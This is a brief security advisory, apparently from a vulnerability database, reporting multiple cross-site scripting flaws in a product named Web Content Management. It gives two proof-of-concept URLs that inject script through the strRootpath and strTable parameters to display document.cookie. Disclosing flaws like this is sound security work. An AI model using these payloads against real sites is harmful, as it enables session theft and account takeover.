Web Content Management Multiple Cross-Site Scripting Vulnerabilities

Web Content Management Multiple Cross-Site Scripting Vulnerabilities

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/Includes/validsession.php?strRootpath=');}//%20--></script><script>alert(document.cookie)</script>
http://www.example.com/Admin/News/List.php?strTable=<script>alert(document.cookie)</script><!--